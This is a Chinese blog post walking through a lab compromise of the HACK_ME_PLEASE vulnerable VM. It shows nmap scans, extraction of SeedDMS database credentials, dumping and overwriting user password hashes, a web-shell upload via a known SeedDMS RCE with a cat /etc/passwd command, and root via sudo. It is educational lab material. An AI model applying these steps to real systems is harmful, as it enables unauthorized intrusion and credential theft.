HACK_ME_PLEASE靶机渗透记录

最新推荐文章于 2024-05-14 11:00:23 发布
althumi
最新推荐文章于 2024-05-14 11:00:23 发布
阅读量411
点赞数 10
文章标签：网络安全内网渗透 ctf python php
本文链接：https://blog.csdn.net/althumi/article/details/135120363
版权
nmap -sP 10.80.56.0/24

主机：10.80.56.101
靶机：10.80.56.183

nmap -p- 10.80.56.183

PORT      STATE SERVICE
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx

nmap -A -n 80 10.80.56.183
nmap -A -n 3306 10.80.56.183
nmap -A -n 33060 10.80.56.183

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to the land of pwnland
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open  mysql   MySQL 8.0.25-0ubuntu0.20.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-07-03T00:33:15
|_Not valid after:  2031-07-01T00:33:15
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.25-0ubuntu0.20.04.1
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: ODBCClient, SwitchToSSLAfterHandshake, LongPassword, Speaks41ProtocolNew, ConnectWithDatabase, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, IgnoreSigpipes, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \x0D\x13V\x1D\x14\x18\x10\x064\x18\x03l\x11\x7F(Dl\x1C\x02\x01
|_  Auth Plugin Name: caching_sha2_password

http://10.80.56.183

<!-- 
Moonlight Template 
https://templatemo.com/tm-512-moonlight
-->

dirb http://10.80.56.183

#获取图片
http://10.80.56.183/img/aa

#查看发现OpenPGP Public Key，查阅发现是非对称加密，常用于邮件，好像没有用
zsteg aa.png                      
meta Software       .. text: "Adobe ImageReady"
meta XML:com.adobe.xmp.. file: Unicode text, UTF-8 text, with very long lines (782), with no line terminators
    00000000: 3c 3f 78 70 61 63 6b 65  74 20 62 65 67 69 6e 3d  |<?xpacket begin=|
    00000010: 22 feff 22 20 69 64 3d 22  57 35 4d 30 4d 70 43 65  |"." id="W5M0MpCe|
    00000020: 68 69 48 7a 72 65 53 7a  4e 54 63 7a 6b 63 39 64  |hiHzreSzNTczkc9d|
    00000030: 22 3f 3e 20 3c 78 3a 78  6d 70 6d 65 74 61 20 78  |"?> <x:xmpmeta x|
    00000040: 6d 6c 6e 73 3a 78 3d 22  61 64 6f 62 65 3a 6e 73  |mlns:x="adobe:ns|
    00000050: 3a 6d 65 74 61 2f 22 20  78 3a 78 6d 70 74 6b 3d  |:meta/" x:xmptk=|
    00000060: 22 41 64 6f 62 65 20 58  4d 50 20 43 6f 72 65 20  |"Adobe XMP Core |
    00000070: 35 2e 36 2d 63 30 36 37  20 37 39 2e 31 35 37 37  |5.6-c067 79.1577|
    00000080: 34 37 2c 20 32 30 31 35  2f 30 33 2f 33 30 2d 32  |47, 2015/03/30-2|
    00000090: 33 3a 34 30 3a 34 32 20  20 20 20 20 20 20 20 22  |3:40:42        "|
    000000a0: 3e 20 3c 72 64 66 3a 52  44 46 20 78 6d 6c 6e 73  |> <rdf:RDF xmlns|
    000000b0: 3a 72 64 66 3d 22 68 74  74 70 3a 2f 2f 77 77 77  |:rdf="http://www|
    000000c0: 2e 77 33 2e 6f 72 67 2f  31 39 39 39 2f 30 32 2f  |.w3.org/1999/02/|
    000000d0: 32 32 2d 72 64 66 2d 73  79 6e 74 61 78 2d 6e 73  |22-rdf-syntax-ns|
    000000e0: 23 22 3e 20 3c 72 64 66  3a 44 65 73 63 72 69 70  |#"> <rdf:Descrip|
    000000f0: 74 69 6f 6e 20 72 64 66  3a 61 62 6f 75 74 3d 22  |tion rdf:about="|
b1,r,lsb,xy         .. text: "J7[z{%^nD"
b2,abgr,lsb,xy      .. text: "*62?11.0000/."
b2,abgr,msb,xy      .. file: OpenPGP Secret Key
b3,abgr,msb,xy      .. file: OpenPGP Public Key
b4,r,lsb,xy         .. file: OpenPGP Public Key
b4,b,lsb,xy         .. text: "eCC$B33233\""
b4,bgr,msb,xy       .. text: "Wwu_wuWwu"
b4,rgba,lsb,xy      .. text: "PP@/0`@_0N @@@@. -0,0"
b4,abgr,msb,xy      .. text: "@'    @G"

#那就只能从前端代码入手了
http://10.80.56.183/js/main.js

// give active class to first link
//make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/
$($('nav a')[0]).addClass('active');

#发现后台界面
http://10.80.56.183/seeddms51x/seeddms-5.1.22/

#查询用漏洞发现存在RCE，但是都绕不过登录
searchsploit seeddms                            
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)          | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                         | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting               | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting                 | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution                     | php/webapps/47022.txt
------------------------------------------------------------------------- ---------------------------------

#最后查阅题解，发现这个seeddms在conf目录下的settings.xml存在数据库信息
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>

#登录数据库
mysql -h 10.80.56.183 -useeddms -pseeddms

#user表
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+

#tblUsers表
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+          
| id | login | pwd                              | fullName      | email              | language | theme | comment | role | hidden | pwdExpiration       | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
|  1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB    |       |         |    1 |      0 | 2021-07-13 00:12:25 |             0 |        0 |     0 |       NULL |
|  2 | guest | NULL                             | Guest User    | NULL               |          |       |         |    2 |      0 | NULL                |             0 |        0 |     0 |       NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+

#尝试破解md5，但是失败，直接更新数据库，密码为123456的md5加密
UPDATE tblUsers SET pwd='e10adc3949ba59abbe56e057f20f883e' where id=1;

#登录后台成功，查看47022.txt，发现存在文件上传，且通过data/1048576/docunment_id/1.php，可以访问
cat 47022.txt

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

#按照格式上传1.php的反弹shell脚本
http://10.80.56.183/seeddms51x/data/1048576/11/1.php

#切换交互式界面
python3 -c "import pty;pty.spawn('/bin/bash')"

#进入/home目录发现用户saket
saket@ubuntu:/home$ ls
ls
saket

#结合上面数据库信息，切换用户
su saket

#查看权限大小，发现是root
sudo -l

#提权，通关
sudo su

cd /root